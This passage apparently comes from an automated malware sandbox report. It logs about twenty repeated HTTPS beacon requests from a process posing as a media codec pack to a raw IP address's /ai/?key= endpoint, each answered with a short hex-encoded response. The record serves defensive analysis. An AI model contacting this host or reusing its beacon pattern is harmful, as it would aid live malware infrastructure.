                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:04 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.449761188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:06 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:07 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:07 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:07 UTC630INData Raw: 32 36 61 0d 0a 38 62 37 32 32 61 37 37 65 34 31 66 35 35 32 63 33 34 34 38 61 33 65 34 36 64 32 30 37 66 65 38 62 33 38 66 38 35 33 66 35 33 62 39 33 62 64 64 38 63 32 35 39 39 36 66 35 39 62 61 34 39 38 36 38 32 32 35 30 63 65 61 31 38 64 65 31 32 33 62 36 63 33 35 65 34 65 38 35 37 65 61 61 65 34 30 64 64 38 36 62 31 63 62 33 32 37 66 64 33 66 34 35 32 63 35 39 64 66 32 34 39 63 39 64 30 39 39 34 62 61 64 62 32 66 31 64 66 30 61 30 37 63 65 64 63 30 34 31 65 64 65 33 33 32 66 31 65 64 62 32 65 38 64 64 30 64 33 38 61 35 66 34 61 63 62 36 65 33 37 66 39 64 37 30 35 35 35 36 66 31 30 37 39 63 63 66 34 31 63 36 38 62 66 66 30 34 31 61 61 65 66 66 35 35 33 61 63 37 33 63 63 63 62 32 31 66 35 66 33 63 64 65 34 34 38 30 65 38 64 35 38 39 38 32 30 61 65 33 32
                                                                                          Data Ascii: 26a8b722a77e41f552c3448a3e46d207fe8b38f853f53b93bdd8c25996f59ba498682250cea18de123b6c35e4e857eaae40dd86b1cb327fd3f452c59df249c9d0994badb2f1df0a07cedc041ede332f1edb2e8dd0d38a5f4acb6e37f9d705556f1079ccf41c68bff041aaeff553ac73cccb21f5f3cde4480e8d589820ae32


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.449768188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:09 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:09 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:09 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:09 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.449774188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:11 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:11 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:11 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:11 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.449780188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:13 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:14 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:14 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:14 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.449786188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:15 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:16 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:16 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:16 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.449792188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:18 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:18 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:18 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:18 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.449797188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:20 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:21 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:21 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:21 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.449807188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:23 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:23 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:23 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:23 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.449814188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:25 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:26 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:26 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:26 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.449819188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:28 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:28 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:28 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:28 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.449825188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:30 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:30 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:30 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          13192.168.2.449831188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:32 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:33 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:33 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:33 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.449837188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:35 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:35 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:35 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:35 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.449843188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:37 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:38 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:37 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:38 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          16192.168.2.449849188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:39 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:40 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:40 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:40 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          17192.168.2.449855188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:42 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:43 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:42 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:43 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          18192.168.2.449861188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:44 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:45 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:45 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:45 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          19192.168.2.449867188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:47 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:48 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:47 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:48 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          20192.168.2.449878188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:49 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:50 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:50 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:50 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          21192.168.2.449883188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:52 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:52 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:52 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:52 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          22192.168.2.449889188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:54 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:55 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:54 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:55 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          23192.168.2.449894188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:56 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:57 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:57 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:45:57 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
